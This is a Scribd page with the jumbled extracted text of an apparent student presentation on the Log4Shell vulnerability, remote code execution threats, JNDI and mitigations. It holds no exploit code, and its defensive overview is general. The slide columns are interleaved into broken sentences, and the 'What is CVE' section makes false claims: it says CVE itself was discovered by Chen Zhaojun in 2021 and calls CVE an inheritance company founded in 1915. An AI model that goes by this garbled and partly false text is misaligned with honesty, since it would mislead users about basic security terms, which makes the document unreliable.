Scribd
Upload
8 views

Presentation For Ethics

Uploaded by

ALMADEN, John Patrick Porio
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PPTX, PDF, TXT or read online on Scribd
8 views

Presentation For Ethics

Uploaded by

ALMADEN, John Patrick Porio
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PPTX, PDF, TXT or read online on Scribd
You are on page 1/ 6

Log4Shell can result in further dangers such as: Since

JNDI lookup supports several types of directories,


including Domain Name Service (DNS), Lightweight
APACHE LOG4J
Directory Access Protocol (LDAP), and Inter-ORB
Protocol (IIOP), which provide useful information like
WHAT IS THE ISSUE?
the organization's network devices,
Attackers may use your resources for cryptocurrency
mining (coinmining). Given the enormous amount of
computer power needed to run services and apps in the
cloud, this danger might be highly expensive.
RCE (Remote Code  ATTACKS USING INJECTION

Execution) or A variety of applications, including SQL searches, employ user-


provided data as input to a command. In an injection attack, the
REMOTE attacker gives input that is purposefully distorted so that a portion of
EXPLOTATION it is read as a command.

RCE flaws give an  ATTACKS ON DESERIALIZATION

attacker the ability to run The deserialization application may interpret user input that has been
specially structured as executable code within the serialized data.
any code on a remote
device. RCE can be  OUT-OF-BOUNDS WRITE
acquired by an attacker
An attacker may be able to create an input that writes outside of the
in a number of methods. allotted buffer if this memory allocation is done improperly. As
executable code is also kept in memory, the program may execute
user-provided data that is written in the appropriate location.
 INITIAL ACCESS
RCE attacks frequently start with a flaw in a publicly accessible application that allows
THE RCE access to run commands on the underlying system. Attackers can utilize this to take
control of a device for the purpose of installing malware or achieving other objectives.
THREAT  Information release:
RCE attacks can be used to set up malware that steals data or to run instructions that
directly extract and exfiltrate data from the affected device.

Allow an attacker  DENIAL OF SERVICE


A RCE flaw enables a hacker to execute code on the system that is running the
to remotely vulnerable application. This might provide them the chance to interfere with the way
this or other system applications operate.
execute malicious  CRYPTOMINING

code on a Malware that mines cryptocurrencies using the processing power of a compromised
device is known as cryptojacking or cryptomining malware. RCE flaws are frequently
used to install and run cryptomining malware on susceptible devices.
computer.  RANSOMWARE
is virus that prevents users from accessing their files unless they pay a ransom to get
them back. Moreover, ransomware can be installed and run on a vulnerable device using
RCE vulnerabilities.
 SANITIZATION OF INPUT
Injection and deserialization flaws are frequently exploited in RCE attacks.
MITIGATION AND Many different types of RCE attacks can be avoided by validating user input
prior to using it in an application.
DETECTION OF  SECURE MEMORY MANAGEMENT
RCE ATTACKS Buffer overflows are a memory management problem that RCE attackers
can take advantage of. Programs should be subjected to vulnerability
Can take advantage of scanning to find buffer overflow and other flaws so they may be found and
fixed.
a range of  TRAFFIC INSPECTION
vulnerabilities, Their name can implies, take place via networks with the attacker first
making it difficult to gaining access to corporate systems by exploiting weak code. An business
should implement network security tools that can stop attempts to exploit
protect against them weak applications and identify remote attacker control of enterprise systems.
with any one  ACCESS CONTROL
approach. An organization can restrict an attacker's ability to travel through the
network and make the most of their initial access to corporate systems by
implementing network segmentation, access management, and a zero trust
security strategy.
JNDI(Java and Naming Directory
Interface)
A set of bindings that connect names to objects is kept up to date by the JNDI
naming service. The related object is returned by the lookup method after receiving
a JNDI name parameter. A naming context, or collection of name-to-object is
offered by JNDI. Every naming procedure is context-dependent, application
programming interface (API) that gives applications created with the JavaTM
programming language directory and naming capability. It is stated in its definition
that it is unrelated to any specific directory service implementation.
 WHAT IS CVE
cve(common vulnerabilities and exposures) was discovered by
chen zhaojun of the alibaba cloud security team on nov 24, 2021
and cve is a inheritence company founded in 1915 by henry
frederick laub

CVE 2021-  WHAT IS THE PURPOSE OF THE CVE?


cve is used to link vulnerability databases and other tools together

44228 and it also facilitates the comparisons between services and


securty tools

 WHO ARE THE VICTIMS OF LOG4J


VULNERABILITY?
the victim of log4j vulnerability are tech companies like
minecraft,google,microsoft,and other big tech companies

You might also like